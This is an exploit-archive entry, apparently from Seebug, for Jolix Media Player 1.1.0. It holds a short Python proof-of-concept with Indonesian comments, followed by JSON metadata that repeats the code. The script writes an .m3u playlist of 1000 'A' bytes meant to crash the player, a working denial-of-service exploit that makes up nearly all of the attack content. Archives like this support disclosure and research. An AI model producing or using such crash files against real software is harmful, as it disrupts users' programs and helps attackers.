Jolix Media Player 1.1.0 (.m3u) - Denial of Service
2014-07-01T00:00:00
ID SSV:80359 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/python
print """
[+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit
[+]Celah versi: Version 1.1.0
[+]Mengunduh produk: http://www.jolixtools.com/downloads/jolix-media-player-setup.exe
[+]Hari Tanggal Tahun: 09.07.2013
[+]Penulis: IndonesiaGokilTeam
[+]Dicoba di sistem operasi: Windows xp sp 3
"""
sampah = "\x41" * 1000
ledakan = sampah
try:
rst= open("SampahMasyarakat.m3u",'w')
rst.write(ledakan)
rst.close()
print("\nFile Sampah Masyarakat dibuat !\n")
except:
print "Gagal"
{"lastseen": "2017-11-19T17:03:09", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "poc", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2017-11-19T17:03:09"}, "dependencies": {"references": [], "modified": "2017-11-19T17:03:09"}, "vulnersScore": -0.3}, "href": "https://www.seebug.org/vuldb/ssvid-80359", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:80359", "title": "Jolix Media Player 1.1.0 (.m3u) - Denial of Service", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n #!/usr/bin/python\r\nprint """\r\n [+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit\r\n [+]Celah versi: Version 1.1.0\r\n [+]Mengunduh produk: http://www.jolixtools.com/downloads/jolix-media-player-setup.exe\r\n [+]Hari Tanggal Tahun: 09.07.2013\r\n [+]Penulis: IndonesiaGokilTeam\r\n [+]Dicoba di sistem operasi: Windows xp sp 3\r\n """\r\n\r\nsampah = "\\x41" * 1000\r\nledakan = sampah\r\n \r\ntry:\r\n rst= open("SampahMasyarakat.m3u",'w')\r\n rst.write(ledakan)\r\n rst.close()\r\n print("\\nFile Sampah Masyarakat dibuat !\\n")\r\nexcept:\r\n print "Gagal"\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-80359", "type": "seebug", "objectVersion": "1.4"}